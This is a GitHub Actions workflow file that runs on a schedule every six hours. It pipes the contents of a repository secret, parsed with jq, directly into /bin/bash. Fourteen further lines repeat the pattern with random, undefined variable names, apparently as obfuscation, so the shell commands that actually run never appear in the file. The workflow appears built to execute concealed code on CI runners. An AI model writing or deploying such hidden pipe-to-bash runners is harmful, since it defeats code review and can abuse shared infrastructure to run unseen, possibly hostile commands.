name: hongqikx
on:
  workflow_dispatch:
  schedule:
    - cron: '21 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: hongqikx
        env:
          ytjkz0089: ${{ secrets.ytjkz0089 }}
        run: |
          echo $ytjkz0089 | jq -r .sq654 | /bin/bash
          echo $rx1741 | jq -r .ofv1 | /bin/bash
          echo $hnj62456 | jq -r .pzn19 | /bin/bash
          echo $ohvvb26773 | jq -r .khqef6 | /bin/bash
          echo $ruo7994 | jq -r .njg8 | /bin/bash
          echo $lt321 | jq -r .sfdrw48 | /bin/bash
          echo $lur89 | jq -r .f29935 | /bin/bash
          echo $aah109 | jq -r .uaboe44384 | /bin/bash
          echo $mwymx548 | jq -r .gcg9 | /bin/bash
          echo $ojk39506 | jq -r .lf49 | /bin/bash
          echo $ot6 | jq -r .ddcv28215 | /bin/bash
          echo $ooeyv80063 | jq -r .yvo17085 | /bin/bash
          echo $swd6856 | jq -r .r822 | /bin/bash
          echo $dxpdl16900 | jq -r .d24230 | /bin/bash
          echo $kiu93378 | jq -r .uktqr25 | /bin/bash

